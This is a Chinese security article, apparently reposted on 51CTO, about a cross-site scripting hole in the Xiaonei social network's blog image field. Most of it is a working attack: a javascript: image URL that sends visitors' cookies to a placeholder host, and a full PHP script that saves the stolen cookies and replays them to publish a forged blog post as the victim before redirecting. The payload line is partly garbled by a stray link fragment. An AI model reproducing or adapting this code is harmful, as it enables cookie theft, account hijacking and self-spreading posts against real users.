校内网最新xss可窃Cookies密码

安全 网站安全
校内网在发blog时对插入图片过滤不严格,存在xss漏洞.

校内网在发blog时对插入图片过滤不严格,存在xss漏洞。

在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码

javascript:window.location.href='http://www.xxx.com/test.
href="tag.php?name=php">php?cookie='+document.cookie  

javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码

ob_start();    
$url = 'blog.xiaonei.com';  
$cookie=$_GET['cookie'];  
$cookie1=$cookie."\r\n\r\n";  
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt  
//发一条伪造的日志,这条日志里面也可以插入恶意代码  
$sock = fsockopen("$url", 80, $errno, $errstr, 30);  
if (!$sock) die("$errstr ($errno)\n");  
$data = "title=test by fly&body=test by
fly&categoryId=0&blogControl=99&passwordProtedted=0&
passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";  
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");  
fwrite($sock, "Accept: */*\r\n");  
fwrite($sock, "Referer: http://$url\r\n");  
fwrite($sock, "Accept-Language: zh-cn\r\n");  
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");  
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");  
fwrite($sock, "User-Agent: Mozilla\r\n");  
fwrite($sock, "Host: $url\r\n");  
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");  
fwrite($sock, "Connection: Keep-Alive\r\n");  
fwrite($sock, "Cache-Control: no-cache\r\n");  
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");  
fwrite($sock, $data);  
$headers = "";  
while ($str = trim(fgets($sock, 4096)))  
$headers .= "$str\n";  
echo "\n";  
$body = "";  
while (!feof($sock))  
$body .= fgets($sock, 4096);  
fclose($sock);  
//echo $body;  
//跳转到一个正常的日志  
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");    
ob_end_flush();  
?>

 

【编辑推荐】

  1. 一只完整的XSS wrom实现流程
  2. XSS攻击Cookie欺骗中隐藏JavaScript执行
  3. 利用HTTP-only Cookie缓解XSS之痛
责任编辑:佚名 来源: 黑软基地
相关推荐

2011-02-24 13:34:09

资源共享

2009-04-25 00:18:33

2009-03-18 08:53:01

校内网用户条款账号

2015-06-12 10:27:46

2014-08-25 10:21:41

2013-03-19 10:48:30

CookiesInPrivate

2010-09-14 22:14:29

2011-03-25 13:38:58

2013-01-09 14:17:59

2009-02-04 11:24:12

2022-02-15 13:50:31

漏洞网络安全网络攻击

2011-02-20 18:48:27

2015-02-05 15:58:06

2012-05-30 16:25:30

密码安全

2013-04-17 10:01:52

jwplayerXSS漏洞

2009-03-11 11:52:08

开放平台

2010-11-09 13:47:30

2011-05-31 15:01:50

2011-05-11 11:13:21

内网嗅探破解

2010-05-15 16:04:52

法国兴业银行DLP商业机密
点赞
收藏

51CTO技术栈公众号